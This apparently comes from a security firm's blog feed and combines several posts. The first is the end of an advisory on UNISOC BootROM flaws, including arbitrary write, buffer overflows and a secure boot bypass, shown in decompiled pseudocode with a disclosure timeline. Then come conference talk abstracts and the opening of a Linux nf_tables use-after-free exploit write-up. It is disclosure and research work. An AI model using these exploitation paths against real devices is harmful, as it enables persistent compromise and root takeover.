  g_cur_write_ptr = g_cur_write_ptr + sz;
  g_num_received = g_num_received + sz;
  send_status(0x80);
  return;
}

As a result, these two commands provide an arbitrary write primitive into the BootROM’s memory space. This functionality could then be used by an attacker with physical access to the device to overwrite a function pointer somewhere in the BootROM data section or a return address stored on the stack and execute their own code with BootROM privileges.

Finding #3: Unchecked Command Index (CVE-2022-38695)

  • NCC Group’s Overall Risk Assessment: Medium

The implementation of the USB command dispatcher is reproduced below in pseudocode:

void recovery_comms(void)
{
  uint uVar1;
  payload_t *buf;
  undefined4 len;

  do {
    while (uVar1 = receive_and_validate_payload(&buf,&len), uVar1 == 0x8f) {
      (*(code *)(&g_func_table)
                [(ulong)((uint)((ulong)buf->cmd_be >> 8) | (uint)buf->cmd_be << 8) & 0xffff])
                (buf,len);
    }
    send_status(uVar1);
    memset2(&DAT_00004998,0,0x30);
  } while( true );
}

Note that the global array g_func_table is indexed with the arbitrary 16-bit argument (buf->cmd_be) which is not validated against the size of the array. Because the array only contains 5 elements, passing a command value greater than 4 would result in data past the end of the array being treated as a function pointer and the BootROM attempting to execute code at that location.

In the worst case scenario, this could result in arbitrary attacker-controlled code being executed within the context of the BootROM. However, because this array is located in the read-only BootROM memory region, and there is no obvious path to implant an attacker-controlled value nearby, the Overall Risk of this finding is reduced to Medium.

Finding #4: Unchecked Write into a Global Buffer (CVE-2022-38696)

  • NCC Group’s Overall Risk Assessment: Medium

The USB data transfer function is reproduced below in pseudocode:

void receive_payload_usb(void)
{
  byte *pbVar1;
  byte ch;
  undefined4 local_4;

  local_4 = 0;
  while (g_recv_status != 3) {
    ch = get_byte_from_usb(&local_4);
    if (g_recv_status == 1) {
      if (ch != 0x7e) {
        if (ch == 0x7d) {
          ch = get_byte_from_usb(&local_4);
          ch = ch ^ 0x20;
        }
        g_recv_status = 2;
        pbVar1 = g_output_ptr + 1;
        *g_output_ptr = ch;
        g_output_ptr = pbVar1;
        g_written_len = g_written_len + 1;
      }
    }
    else if (g_recv_status == 0) {
      if (ch == 0x7e) {
        g_recv_status = 1;
      }
    }
    else if (g_recv_status == 2) {
      if (ch == 0x7e) {
        g_recv_status = 3;
      }
      else {
        if (ch == 0x7d) {
          ch = get_byte_from_usb(&local_4);
          ch = ch ^ 0x20;
        }
        pbVar1 = g_output_ptr + 1;
        *g_output_ptr = ch;
        g_output_ptr = pbVar1;
        g_written_len = g_written_len + 1;
      }
    }
  }
  return;
}

The data is read byte-by-byte from the host and unmasked using an HDLC-like algorithm. Because there is no length checking performed against the received data, a host that sends a large payload could overflow the fixed-size BootROM buffer, resulting in memory corruption within the BootROM and potentially code execution.

The same issue exists in the UART data transfer function, receive_payload_uart(), located at address 0x104924 in the BootROM.

Note that while the global buffer is located close to the end of BootROM memory and past the stack region, and it is not possible to trivially obtain code execution by overwriting a return pointer, an adversary may instead attempt to write to a memory-mapped hardware device instead that is present on the system and induce a controllable memory corruption that way.

Finding #5: Lack of USB wLength Validation

  • NCC Group’s Overall Risk Assessment: Low

The USB setup packet handler contains a vulnerability where it does not properly validate the value of wLength for requests of type GET_STATUS:

void handle_setup_request(void)
{
    ...
    reqTypeBit = g_setup.bmRequestType >> 5 & 3;
      ...
      if (g_setup.bRequest == 0) {
        bVar2 = cRead_1(DAT_5fff0012);
        cWrite_1(DAT_5fff0012,bVar2 | 0x40);
        idx = 0;
        if (CONCAT11(g_setup.wLength._1_1_,(undefined)g_setup.wLength) != 0) {
          do {
            cWrite_1(usb_txrx,(&DAT_00004010)[idx]);
            idx = idx + 1;
          } while (idx < CONCAT11(g_setup.wLength._1_1_,(undefined)g_setup.wLength));
        }
        bVar2 = cRead_1(DAT_5fff0012);
        cWrite_1(DAT_5fff0012,bVar2 | 10);
        return;
      }
    ...
    else if (reqTypeBit == 2) {
      bVar2 = cRead_1(DAT_5fff0012);
      cWrite_1(DAT_5fff0012,bVar2 | 0x40);
      idx = 0;
      if (CONCAT11(g_setup.wLength._1_1_,(undefined)g_setup.wLength) != 0) {
        do {
          cWrite_1(usb_txrx,(&DAT_00004010)[idx]);
          idx = idx + 1;
        } while (idx < CONCAT11(g_setup.wLength._1_1_,(undefined)g_setup.wLength));
      }
      bVar2 = cRead_1(DAT_5fff0012);
      cWrite_1(DAT_5fff0012,bVar2 | 10);
    }
    ...
}

As a result, sending a GET_STATUS setup request with a large wLength value would disclose memory past the end of the DAT_00004010 global variable.

Finding #6: Lack of Payload Size Validation

  • NCC Group’s Overall Risk Assessment: Low

The implementation of the USB command dispatch is reproduced below in pseudocode:

void recovery_comms(void)
{
  uint uVar1;
  payload_t *buf;
  undefined4 len;

  do {
    while (uVar1 = receive_and_validate_payload(&buf,&len), uVar1 == 0x8f) {
      (*(code *)(&g_func_table)
                [(ulong)((uint)((ulong)buf->cmd_be >> 8) | (uint)buf->cmd_be << 8) & 0xffff])
                (buf,len);
    }
    send_status(uVar1);
    memset2(&DAT_00004998,0,0x30);
  } while( true );
}

Note how two arguments are passed further to the implementation: the payload buffer and its size. However, as NCC Group has discovered, the implementation does not actually validate the size of the received payload:

void cmd_start_usb(cmd_start_t *payload)
{
  uint write_addr_be;
  uint write_sz_be;

  write_addr_be = payload->addr_be;
  write_sz_be = payload->sz_be;
  g_write_addr = (ulong)((write_addr_be ^ (write_addr_be >> 0x10 | write_addr_be << 0x10)) >> 8 &
                         0xff00ff ^ (write_addr_be >> 8 | write_addr_be << 0x18));
  g_write_sz = (ulong)((write_sz_be ^ (write_sz_be >> 0x10 | write_sz_be << 0x10)) >> 8 & 0xff00ff ^
                      (write_sz_be >> 8 | write_sz_be << 0x18));
  g_cur_write_ptr = g_write_addr;
  send_status(0x80);
  return;
}

void cmd_recv_data_usb(cmd_recv_data_t *payload)
{
  ulong sz;

  sz = (ulong)((uint)((ulong)payload->size_be >> 8) | (payload->size_be & 0xff) << 8);
  memcpy2(g_cur_write_ptr,payload->data,sz);
  g_cur_write_ptr = g_cur_write_ptr + sz;
  g_num_received = g_num_received + sz;
  send_status(0x80);
  return;
}

In particular, cmd_start_usb retrieves write address and size from the payload buffer without validating that the payload buffer is at least 12 bytes (2 bytes header, 2 bytes padding, 4 bytes for addr_be and 4 bytes for sz_be), and cmd_recv_data_usb copies data of sz bytes from the payload without validating the amount of data present. As a result, uninitialized memory values may be unintentionally copied. Then, by attempting to execute the resulting image, and observing the returned error code, it may be possible for an adversary to disclose portions of the BootROM memory.

Additionally, the same issue exists in the UART recovery command handlers cmd_start_uart and cmd_recv_data_uart.

Vulnerabilities in the Executable Loading

After discovering the issues in the recovery mode, NCC Group’s focus shifted to the regular boot process. The UNISOC BootROM implements a secure boot chain with the root key anchored within the BootROM by utilizing eFuses. Every stage in the boot process is then responsible for validating the signature of the next stage. As such, compromising an early boot stage, such as BootROM validation of the second-stage bootloader, would allow for a complete takeover of the rest of the system.

One vulnerability was discovered in the loading of second-stage executables. Since this code is used for both the regular boot and the recovery boot, exploitation of this single vulnerability allows for a persistent compromise of the system.

Finding #7: Lack of Certificate Type 0 Validation results in Memory Corruption (CVE-2022-38691, CVE-2022-38692)

  • NCC Group’s Overall Risk Assessment: Critical

The second-stage bootloader loaded by the BootROM contains a certificate as a part of its image. This certificate includes a public RSA key to validate the current image, as well as hash of the next public RSA key in the boot process. This creates a secure boot chain that is ultimately anchored by the BootROM to a hash of the first public RSA key stored in eFuses. However, a vulnerability is present in the BootROM where the hash of the public RSA key is not always properly validated.

Specifically, the BootROM accepts two types of certificates: 0 (contentcert) and 1 (keycert). According to the UNISOC’s U-Boot source code, the keycert embeds a hash of the next public key, creating a secure boot chain, whereas the contentcert does not and appears to be used as the last certificate in the chain. Normally, a certificate of type 1 is embedded within the second-stage bootloader and in this case the BootROM properly validates its public RSA key against eFuses. However, in the case where the certificate of type 0 is used, no such validation is performed as can be seen from the second if condition branch in the pseudocode snippet below:

undefined8 validate_rsa(byte *fused_key_hash,byte *calculated_payload_hash,cert_t *cert)
{
  ...
  certtype = *(byte *)&cert->certtype;
  memset(decrypted_sig,0,0x100);
  pubkey_hash._0_8_ = 0;
  pubkey_hash._8_8_ = 0;
  pubkey_hash._16_8_ = 0;
  pubkey_hash._24_8_ = 0;

  if (certtype < 2) {
    if (certtype == 1) {
      if ((cert1->type == 1) && (g_min_required_ver <= cert1->version)) {
        calculate_hash(&cert1->pubkey,((cert1->pubkey).keybit_len >> 3) + 8,pubkey_hash);
        iVar1 = memcmp(calculated_payload_hash,cert1->hash_data,0x20);
        if ((iVar1 == 0) && (iVar1 = memcmp(fused_key_hash,pubkey_hash,0x20), iVar1 == 0)) {
          local_4 = do_rsa_powmod(&(cert1->pubkey).e, (cert1->pubkey).n,
                                  (cert1->pubkey).keybit_len, cert1->signature,
                                  decrypted_sig);
          calculate_hash(cert1->hash_data,0x48,hashed_contents);
          validate_sig_oaep(hashed_contents,0x20,decrypted_sig,0x100,0x20,0x2000004,0x2000004,
                            0x800,&local_4);
          is_valid = 1;
          if (local_4 != 0) {
            set_flag(0x2000000000);
            is_valid = 0;
          }
        } else {
          set_flag(0x400000000);
          is_valid = 0;
        }
      } else {
        set_flag(0x8000000000);
        is_valid = 0;
      }
    }
    else if ((cert0->type == 1) && (g_min_required_ver <= cert0->version)) {
      calculate_hash(&cert0->pubkey,((cert0->pubkey).keybit_len >> 3) + 8,pubkey_hash);
      // NCC: No call to memcmp pubkey_hash
      iVar1 = memcmp(calculated_payload_hash,cert0->hash_data,0x20);
      if (iVar1 == 0) {
        local_4 = do_rsa_powmod(&(cert0->pubkey).e, (cert0->pubkey).n,
                                (cert0->pubkey).keybit_len, cert0->signature,
                                decrypted_sig);
        calculate_hash(cert0->hash_data,0x48,hashed_contents);
        validate_sig_oaep(hashed_contents,0x20,decrypted_sig,0x100,0x20,0x2000004,0x2000004,
                          0x800,&local_4);
        is_valid = 1;
        if (local_4 != 0) {
          set_flag(0x2000000000);
          is_valid = 0;
        }
      } else {
        set_flag(0x400000000);
        is_valid = 0;
      }
    } else {
      set_flag(0x8000000000);
      is_valid = 0;
    }
  } else {
    set_flag(0x1000000000);
    is_valid = 0;
  }
  return is_valid;
}

As a result, an arbitrary public RSA key could be provided by an adversary with the certificate type set to 0. Several possibilities then exist for potential exploitation of this issue.

Crafted RSA Signature

Since an adversary now controls the public RSA key, an obvious avenue to exploit this vulnerability would be to craft a legitimate signature for an arbitrary bootloader image. However, an additional issue exists in the BootROM in the following snippet:

local_4 = do_rsa_powmod(&(cert0->pubkey).e,(cert0->pubkey).n,(cert0->pubkey).keybit_len,
                        cert0->signature,decrypted_sig);
calculate_hash(cert0->hash_data,0x48,hashed_contents);
validate_sig_oaep(hashed_contents,0x20,decrypted_sig,0x100,0x20,0x2000004,0x2000004,0x800,
                  &local_4);

Consider the definition of both cert0_t and cert1_t structures:

struct cert0_t {
    uint certtype;
    struct pubkey_t pubkey;
    byte hash_data[32];
    uint type;
    uint version;
    byte signature[256];
};

struct cert1_t {
    uint certtype;
    struct pubkey_t pubkey;
    byte hash_data[32];
    byte hash_key[32];
    uint type;
    uint version;
    byte signature[256];
};

Note that an additional 32-byte hash_key field exists in the cert1_t structure. The intent of passing size 0x48 to the calculate_hash function is to capture all of hash_data, hash_key, type and version variables in the hash. However, when dealing with the certificate type 0, the hash_key field does not exist, and so a 32-byte chunk of the signature is calculated as part of the hash that is then validated using RSA-OAEP. Due to the implementation details, NCC Group was unable to craft a valid signature that could bypass this check.

Buffer Overflow when Reading the Key

Another issue is present in the RSA validation functionality that could result in a memory corruption occurring within the BootROM. Prior to performing the RSA operation, a byte-swap is performed and the result stored in a global buffer in BootROM memory:

undefined4 do_rsa_powmod(undefined8 e,undefined8 n,undefined4 bits,undefined8 sig,undefined8 dst)
{
  undefined4 uVar1;

  memset(BYTE_ARRAY_00002988,0,0x100);
  uVar1 = FUN_001059ec(e,n,bits,sig,BYTE_ARRAY_00002988);
  memcpy2(dst,BYTE_ARRAY_00002988,0x100);
  return uVar1;
}

undefined8 FUN_001059ec(undefined8 e,undefined8 n,int bits,undefined8 sig,undefined8 dst)
{
  FUN_00105514(dst,sig,n,e,bits >> 3);
  return 0x100;
}

void FUN_00105514(undefined8 dst,undefined8 sig,long n,long e,uint bytelen)
{
  DAT_00004420 = 0;
  DAT_00004428 = 0;
  DAT_00004430 = 0;
  DAT_00004438 = 0;
  DAT_00004440 = 0;
  memset(g_n,0,0x800);
  if (e != 0) {
    byteswap_for_rsa(g_e,e,4);
  }
  if (n != 0) {
    byteswap_for_rsa(g_n,n,bytelen);
  }
  byteswap_for_rsa(g_sig,sig,bytelen);
  DAT_00004420 = 0xe1000010e0c0001;
  DAT_00004428 = CONCAT44(0xb0002168,(bytelen & 0xffff) << 2 | 0x8d00001);
  DAT_00004430 = 0xb0082468b0042268;
  DAT_00004438 = 0xb80c2368580c1080;
  DAT_00004440 = CONCAT44(DAT_00004440._4_4_,0xffffffff);
  FUN_001054c0(0x8000001);
  FUN_001052c4();
  memcpy(dst,g_decoded,(long)(int)bytelen);
  do_byteswap_inplace(dst,bytelen);
  return;
}

Because no size check is performed against the RSA key size, a key greater than 2048 bits would overflow the global g_n and g_sig buffers which are 256 bytes in size. These buffers are located at addresses 0x2168 and 0x2268. Since the stack pointer is set to 0x4000 during BootROM initialization, a large RSA key is able to corrupt the stored return address on the stack and then cause arbitrary code to be executed. Since the vulnerable RSA key parsing is reachable from both the recovery and regular boot modes, this vulnerability could be exploited for persistent code execution within the BootROM context.

Conclusion

Despite a fairly minimal feature set and a small size of its binary, the UNISOC BootROM was found to contain several high-impact vulnerabilities, potentially affecting millions of shipped devices. While these issues cannot be fixed due to the read-only nature of the BootROM code, users can reduce their risk by not leaving their devices unattended, and installing latest software updates to mitigate the risk of CVE-2022-38691/CVE-2022-38692 being persistently exploited through a temporary privilege escalation.

Timeline

  • May 26th: NCC Group attempts to contact UNISOC by emailing the [email protected] address. This initial contact attempt is unsuccessful due to an error returned by the UNISOC mail server.
  • May 31st: NCC Group attempts direct email contact with several members of the UNISOC security team.
  • June 2nd: NCC Group receives UNISOC’s PGP key and confirmed that the previously encountered mail server issue is now resolved.
  • June 2nd: Vulnerability report submitted to UNISOC.
  • June 6th: UNISOC confirms receipt of the report; NCC Group follows-up by asking to publicly disclose the report on July 6th.
  • June 15th: UNISOC requests to delay the disclosure timeline by 8 weeks; NCC Group accepts disclosure date of August 10th.
  • July 6th: NCC Group asks UNISOC for an update to ensure everything is on track for August 10th. We did not receive a response.
  • July 18th: NCC Group requests an update. We did not receive a response.
  • July 28th: NCC Group asks for another update and reminds UNISOC that the embargo deadline is less than 2 weeks away.
  • August 2nd: NCC Group requests CVE assignment from MITRE. This request is subsequently denied on August 4th as UNISOC has signed up as a CVE CNA in the meantime.
  • August 5th: UNISOC responds and confirms they have requested CVE numbers and also asks to extend the advisory date to September 2nd.
  • August 23rd: NCC Group requests an update from UNISOC including information about the assigned CVE numbers.
  • August 29th: UNISOC sets up a meeting during which it requests another extension of up to 3 months. NCC Group opts to publish on the previously agreed upon date.
  • September 1st: UNISOC responds to NCC Group, providing requested CVE numbers.
  • September 2nd: Publication of this advisory.

Conference Talks – September/October 2022

1 September 2022 at 15:29

Throughout September and October, members of NCC Group will be presenting their work at SANS CyberThreat, 44CON, ResponderCon, BSides St John’s, ICMC, DevOps World, RootCon, Hexacon, and Hardwear.io NL.

  • Ollie Whitehouse & Eric Shamper, “Enterprise IR:Live Free, live large” to be presented at Sans CyberThreat (September 12-13 2022)
  • NCC Group, “Mastering Container Security,” training to be presented at 44CON (September 12-14 2022)
  • Balazs Bucsay, “Alternative way to detect mikatz” to be presented at ResponderCon (September 13 2022)
  • Jeremy Boone, “Shooting yourself in the Boot – Common Secure Boot Mistakes” to be presented at BSides St John’s (September 15 2022)
  • Paul Bottinelli, “Selected Cryptography Vulnerabilities of IoT Implementations” to be presented at the International Cryptographic Module Conference (September 16 2022)
  • Viktor Gazdag, “War stories of Jenkins Security Assessments” to be presented at DevOps World 2022 (September 28-29 2022)
  • Balazs Bucsay, ” Alternative way to detect mimikatz” to be presented at RootCon (September 28-29 2022)
  • Cedric Halbronn & Alex Plaskett, “Toner Deaf – Printing your next persistence” to be presented at Hexacon (October 14-15 2022)
  • Sultan Qasim Khan, “Popping Locks, Stealing Cars, & Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks” to be presented at Hardwear.io NL (October 27-28 2022)

Please join us!

Enterprise IR: Live free, live large

Ollie Whitehouse & Eric Shamper

SANS CyberThreat 22

September 12-13, 2022

Abstract forthcoming.

Mastering Container Security

NCC Group

44CON

September 12-14, 2022

Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

This course takes a deep dive into the world of Linux containers, covering fundamental technologies and practical approaches to attacking and defending container-based systems such as Docker and Kubernetes.

In the 2022 version of the course the trainers will be focusing more on Kubernetes as it emerges as the dominant core of cloud native systems and looking at the wider ecosystem of products which are used in conjunction with Kubernetes.

Alternative ways to detect mimikatz

Balazs Bucsay

ResponderCon

September 13 2022

Mimikatz is detected by AVs and EDRs in different ways, mostly based on signatures and behavior analysis. These techniques are well known, but we looked into a few other things to find more exotic ways. Turns our that mimikatz by default talking to USB devices, so I created an emulated device as a user-mode driver for Windows, which is capable to detect most mimikatz variants out-of-the-box. Other technique was implemented and will be part of the presentation, where the console communication is “sniffed”, but this technique can be applied to other malware as well. Both techniques will be published and code will be opensourced after the con.

Shooting Yourself In The Boot – Common Secure Boot Mistakes

Jeremy Boone

BSides St. John’s

September 15 2022

Secure boot is the mechanism by which an embedded device safely loads and cryptographically verifies its runtime firmware or software. Secure boot is an important and necessary feature for embedded systems — without it, an attacker could compromise the device, implant a rootkit or bootkit, and even persist across factory resets or OS reinstalls. In this talk, I will describe how hardware devices typically implement secure boot, and will dive into several common implementation mistakes and foot-guns that can enable an adversary to bypass these low level hardware security controls.

Selected Cryptography Vulnerabilities of IoT Implementations

Paul Bottinelli

International Cryptographic Module Conference (ICMC 2022)

September 16, 2022

In this talk, Paul will present a number of selected cryptography vulnerabilities encountered during security reviews and penetration tests of IoT solutions.

War stories of Jenkins Security Assessments

Viktor Gazdag

DevOps World

September 29 2022

I will talk about 3 security engagements and how I was able to gain access to the Jenkins environment.

There will be an overview about what security configurations are available and what additional plugins can be installed for improving the security posture.

We will answer the question if these settings are working or is there any missing gaps/parts (like audit plugins available, but has vulnerabilities)?

Sharing a Jenkins hardening checklist for easy wins and making an attacker’s life hard when they are attacking.

Alternative ways to detect mimikatz

Balazs Bucsay

RootCon

September 28-30 2022

Mimikatz is detected by AVs and EDRs in different ways, mostly based on signatures and behavior analysis. These techniques are well known, but we looked into a few other things to find more exotic ways. Turns our that mimikatz by default talking to USB devices, so I created an emulated device as a user-mode driver for Windows, which is capable to detect most mimikatz variants out-of-the-box. Other technique was implemented and will be part of the presentation, where the console communication is “sniffed”, but this technique can be applied to other malware as well. Both techniques will be published and code will be opensourced after the con.

Toner Deaf – Printing your next persistence

Cedric Halbronn & Alex Plaskett

Hexacon

October 14-15 2022

In November 2021, NCC Group won at the Pwn2Own hacking contest against a Lexmark printer. This talk is about the journey from purchase of the printer, having zero knowledge of its internals, remotely compromising it using a vulnerability which affected 235 models, developing a persistence mechanism and more.

This talk is particularly relevant due to printers having access to a wide range of documents within an organisation, the printers often being connected to internal/sensitive parts of a network, their lack of detection/monitoring capability and often poor firmware update management processes.


Popping Locks, Stealing Cars, and Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks

Sultan Qasim Khan

Hardwear.io Netherlands

October 27-28 2022

In this presentation I will show the workings of Sniffle Relay, the world’s first link layer relay attack on Bluetooth Low Energy (BLE), categorically defeating existing applications of BLE-based proximity authentication currently used to unlock millions of vehicles, smart locks, building access control systems, mobile devices, and laptops. This attack can be used to relay unlock commands over long distances, even when link layer encryption or GATT latency bounding have been used to mitigate against existing BLE relay attack tools.

Unlike all pre-existing GATT-based BLE MITM and relay tooling, Sniffle Relay allows relaying connections that employ link layer encryption. Furthermore, Sniffle Relay applies novel relaying techniques that limit the added latency to within the range of normal GATT response timing variation, in many cases hiding the added latency altogether.

To emphasize the impact of these findings, I will demonstrate how this attack can be used to steal a Tesla Model Y, alongside multiple other demos – affecting in some cases up to hundreds of millions of devices each – some of which can be unlocked from halfway around the world.

SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)

1 September 2022 at 08:56

The final exploit in action:

Introduction

The Exploit Development Group (EDG) at NCC Group planned to compete in the Pwn2Own Desktop 2022 competition specifically targeting the Ubuntu kernel. This was actually going quite well in the beginning because we found quite a few vulnerabilities quite early on. Our problems began when the first vulnerability we found and exploited was publicly disclosed by someone else and patched as CVE-2022-0185.

This meant we had to look for a new vulnerability as a replacement. Not long after finding a new bug and working through a bunch of exploitation tasks (such as bypassing KASLR), this second bug was also publicly disclosed and fixed as CVE-2022-0995.

We finally started working on a third vulnerability but unfortunately we didn’t have enough time to make it stable enough in order to feel confident to compete at Pwn2Own before the deadline. There was also a last minute update of Ubuntu from 21.10 to 22.04 which changed kernel point release, and thus some of the slab objects that we were originally using for exploitation didn’t work anymore on the latest Ubuntu, hence requiring more time to develop a working exploit.

After we missed the competition deadline we just decided to disclose the vulnerability after we successfully exploited it, and it was assigned as CVE-2022-32250 so this write-up describes the vulnerability and the process we used to exploit it. Our final exploit targets the latest Ubuntu (22.04) and the Linux kernel 5.15.

We will show that a quite limited use-after-free vulnerability affecting the netlink subsystem can be exploited twice to open up other more powerful use-after-free primitives. By triggering four use-after-free conditions in total, we are able to bypass KASLR and kick off a ROP gadget that allows us to overwrite modprobe_path and spawn an elevated shell as root. You would think that triggering four use-after-free’s would lead to a less reliable exploit. However, we will demonstrate how its reliability was significantly improved to build a very stable exploit.

netlink and nf_tables Overview

In April 2022, David Bouman wrote a fantastic article about a separate vulnerability in nf_tables. In this article, he goes into great detail about how nf_tables works and also provides an open source helper library with some good APIs for interacting with nf_tables functionality in a more pleasant way, so we highly recommend checking it out.

At the very least, please check out sections “2. Introduction to netfilter” and “3. Introduction to nf_tables” from his paper, as it will provide a more in depth background into a lot of the functionality we will be interacting with.

Instead of repeating what David already wrote, we will only focus on adding relevant details for our vulnerability that aren’t covered in his article.

Sets

nf_tables has the concept of sets. These effectively allow you to create anonymous or named lists of key/value pairs. An anonymous set must be associated with a rule, but a named set can be created independently and referenced later. A set does however still need to be associated with an existing table and chain.

Sets are represented internally by the nft_set structure.

// https://elixir.bootlin.com/linux/v5.13/source/include/net/netfilter/nf_tables.h#L440
/**
 *    struct nft_set - nf_tables set instance
 *
 *    @list: table set list node
 *    @bindings: list of set bindings
 *    @table: table this set belongs to
 *    @net: netnamespace this set belongs to
 *    @name: name of the set
 *    @handle: unique handle of the set
 *    @ktype: key type (numeric type defined by userspace, not used in the kernel)
 *    @dtype: data type (verdict or numeric type defined by userspace)
 *    @objtype: object type (see NFT_OBJECT_* definitions)
 *    @size: maximum set size
 *    @field_len: length of each field in concatenation, bytes
 *    @field_count: number of concatenated fields in element
 *    @use: number of rules references to this set
 *    @nelems: number of elements
 *    @ndeact: number of deactivated elements queued for removal
 *    @timeout: default timeout value in jiffies
 *    @gc_int: garbage collection interval in msecs
 *    @policy: set parameterization (see enum nft_set_policies)
 *    @udlen: user data length
 *    @udata: user data
 *    @expr: stateful expression
 *    @ops: set ops
 *    @flags: set flags
 *    @genmask: generation mask
 *    @klen: key length
 *    @dlen: data length
 *    @data: private set data
 */
struct nft_set {
    struct list_head   list;
    struct list_head   bindings;
    struct nft_table   *table;
    possible_net_t     net;
    char               *name;
    u64                handle;
    u32                ktype;
    u32                dtype;
    u32                objtype;
    u32                size;
    u8                 field_len[NFT_REG32_COUNT];
    u8                 field_count;
    u32                use;
    atomic_t           nelems;
    u32                ndeact;
    u64                timeout;
    u32                gc_int;
    u16                policy;
    u16                udlen;
    unsigned char      *udata;
    /* runtime data below here */
    const struct nft_set_ops    *ops ____cacheline_aligned;
    u16                flags:14,
                       genmask:2;
    u8                 klen;
    u8                 dlen;
    u8                 num_exprs;
    struct nft_expr    *exprs[NFT_SET_EXPR_MAX];
    struct list_head   catchall_list;
    unsigned char      data[]
    __attribute__((aligned(__alignof__(u64))));
};

There are quite a few interesting fields in this structure that we will end up working with. We will summarize a few of them here:

  • list: A doubly linked list of nft_set structures associated with the same table
  • bindings: A doubly linked list of expressions that are bound to this set, effectively meaning there is a rule that is referencing this set
  • name: The name of the set which is used to look it up when triggering certain functionality. The name is often required, although there are some APIs that will use the handle identifier instead
  • use: Counter that will get incremented when there are expressions bound to the set
  • nelems: Number of elements
  • ndeact: Number of deactivated elements
  • udlen: The length of user supplied data stored in the set’s data array
  • udata: A pointer into the set’s data array, which points to the beginning of user supplied data
  • ops: A function table pointer

A set can be created with or without user data being specified. If no user data is supplied when allocating a set, it will be placed on the kmalloc-512 slab. If even a little bit of data is supplied, it will push the allocation size over 512 bytes and the set will be allocated onto kmalloc-1k.

Taking a closer look at the ops member we see:

/**
 *    struct nft_set_ops - nf_tables set operations
 *
 *    @lookup: look up an element within the set
 *    @update: update an element if exists, add it if doesn't exist
 *    ...
 *
 *    Operations lookup, update and delete have simpler interfaces, are faster
 *    and currently only used in the packet path. All the rest are slower,
 *    control plane functions.
 */
struct nft_set_ops {
    bool                (*lookup)(const struct net *net,
                          const struct nft_set *set,
                          const u32 *key,
                          const struct nft_set_ext **ext);
    bool                (*update)(struct nft_set *set,
                          const u32 *key,
                          void *(*new)(struct nft_set *,
                                   const struct nft_expr *,
                                   struct nft_regs *),
                          const struct nft_expr *expr,
                          struct nft_regs *regs,
                          const struct nft_set_ext **ext);
    ...
};

We will elaborate on how we use or abuse these structure members in more detail as we run into them.

Expressions

Expressions are effectively the discrete pieces of logic associated with a rule. They let you get information out of network traffic that is occurring in order to analyze, to allow you to modify properties of a set map value, etc.

When an expression type is defined by a module (ex: net/netfilter/nft_immediate.c) in the kernel, there is an associated nft_expr_type structure that allows to specify the name, the associated ops function table, flags, etc.

/**
 * struct nft_expr_type - nf_tables expression type
 *
 * @select_ops: function to select nft_expr_ops
 * @release_ops: release nft_expr_ops
 * @ops: default ops, used when no select_ops functions is present
 * @list: used internally
 * @name: Identifier
 * @owner: module reference
 * @policy: netlink attribute policy
 * @maxattr: highest netlink attribute number
 * @family: address family for AF-specific types
 * @flags: expression type flags
 */
struct nft_expr_type {
    const struct nft_expr_ops *(*select_ops)(const struct nft_ctx *,
                               const struct nlattr * const tb[]);
    void (*release_ops)(const struct nft_expr_ops *ops);
    const struct nft_expr_ops *ops;
    struct list_head list;
    const char *name;
    struct module *owner;
    const struct nla_policy *policy;
    unsigned int maxattr;
    u8 family;
    u8 flags;
};

At the time of writing there are only two expression type flags values, stateful (NFT_EXPR_STATEFUL) and garbage collectible (NFT_EXPR_GC).

Set Expressions

When creating a set, it is possible to associate a small number of expressions with the set itself. The main example used in the documentation is using a counter expression (net/netlink/nft_counter.c). If there is a set of ports associated with a rule, then the counter expression will tell nf_tables to count the number of times the rule hits and increment the associated values in the set.

A maximum of two expressions can be associated with a set. There are a myriad of available expressions in nf_tables. For the purposes of this paper, we are interested in only a few. It is worth noting that only those known as stateful expressions are meant to be associated with a set. Those that are not stateful will eventually be rejected.

When an expression is associated with a set, it will be bound to the set on the list called set->bindings. The set->use counter will also be incremented which prevents the set from being destroyed until the associated expressions are destroyed and removed from the list.

Stateful Expressions

The high-level documentation details stateful objects. They are associated with things like rules and sets to track the state of the rules. Internally, these stateful objects are actually created through the use of different expression types. There are a fairly limited number of these types of stateful expressions, but they include things like counters, connection limits, etc.

Expressions of Interest

nft_lookup

Module: net/netfilter/nft_lookup.c

In the documentation, the lookup expression is described as “search for data from a given register (key) into a dataset. If the set is a map/vmap, returns the value for that key.”. When using this expression, you provide a set identifier, and specify a key into the associated map.

This set is interesting to us because as we will see in more detail later, the allocated expression object becomes “bound” to the set that is looked up.

These expressions are stored on the kmalloc-48 slab cache.

nft_dynset

Module: net/netfilter/nft_dynset.c

The dynamic set expression is designed to allow for more complex expressions to be associated with specific set values. It allows you to read and write values from a set, rather than something more basic like a counter or connection limit.

Similarly to nft_lookup, this set is interesting to us because it is “bound” to the set that is looked up during expression initialization.

These expressions are stored on the kmalloc-96 slab cache.

nft_connlimit

Module: net/netfilter/nft_connlimit.c

The connection limit is a stateful expression. Its purpose is to to limit the number of connections per IP address. This is a legitimate expression that could be associated with a set during creation, where the set may contain the list of IP addresses to enforce the limit on.

This expression is interesting for two reasons:

  1. It is an example of a expression marked with the NFT_EXPR_STATEFUL which is what allows it to be legitimately embedded in a set during creation.
  2. It also is marked with the NFT_EXPR_GC, which means it can be used to access specific function pointers related to garbage collection that are not exposed with most expressions.
static struct nft_expr_type nft_connlimit_type __read_mostly = {
    .name = "connlimit",
    .ops = &nft_connlimit_ops,
    .policy = nft_connlimit_policy,
    .maxattr = NFTA_CONNLIMIT_MAX,
    .flags = NFT_EXPR_STATEFUL | NFT_EXPR_GC,
    .owner = THIS_MODULE,
};

Vulnerability Discovery

We did a combination of fuzzing with syzkaller and manual code review, but the majority of vulnerabilities were found via fuzzing. Although we used private grammars to improve code coverage of areas we wanted to target, some of the bugs were triggerable by the public grammars.

One important approach to fuzzing in this particular case was about limiting the fuzzer to focus on netfilter-based code. Looking at the netfilter code and previously identified bugs, we determined that the complexity of the code warranted more dedicated fuzzing compute power focused on this area.

In the case of this bug, the fuzzer found the vulnerability but was unable to generate a reproduction (repro) program. Typically, this makes analyzing the vulnerability much harder. However, it seemed quite promising in that it implied that other people that might be fuzzing might not select this particular bug because it is harder to triage. After having two different bugs burnt we were keen on something that would be less likely to happen again and we needed a fast replacement in time for the contest. From initial eyeballing of the crash, a use-after-free (UAF) write looked worthy of investigation.

